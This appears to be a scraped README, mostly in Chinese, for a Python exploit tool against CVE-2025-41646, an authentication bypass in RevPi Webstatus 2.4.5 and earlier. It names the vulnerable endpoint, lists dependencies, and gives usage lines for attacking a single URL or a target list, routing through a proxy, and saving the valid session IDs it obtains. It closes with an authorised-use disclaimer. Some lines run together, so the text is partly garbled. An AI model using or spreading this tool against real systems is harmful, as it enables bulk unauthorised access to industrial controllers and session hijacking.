这是一个针对 CVE-2025-41646 的 Python3 漏洞利用脚本,该漏洞是一个影响 RevPi Webstatus <= 2.4.5 的 认证绕过漏洞。
/php/dal.phppip install -r requirements.txt
requests
urllib3(通常随 requests 一起安装)
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100"
python3 cve_2025_41646_auth_bypass.py -l targets.txt
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --proxy "http://127.0.0.1:8080"
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --silent
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --json
请求/响应
此工具仅用于教育和授权的渗透测试目的。 未经明确许可对系统进行未授权使用是违法的。
| Option | Description |
|---|
-u, --url | 目标URL(例如 http://IP) |
-l, --list | 包含目标列表的文件 |
-o, --output | 保存有效会话ID的输出文件 |
--proxy | 使用代理(http://127.0.0.1:8080) |
--json | 打印原始JSON输出 |
--silent | 静默模式(仅打印会话ID) |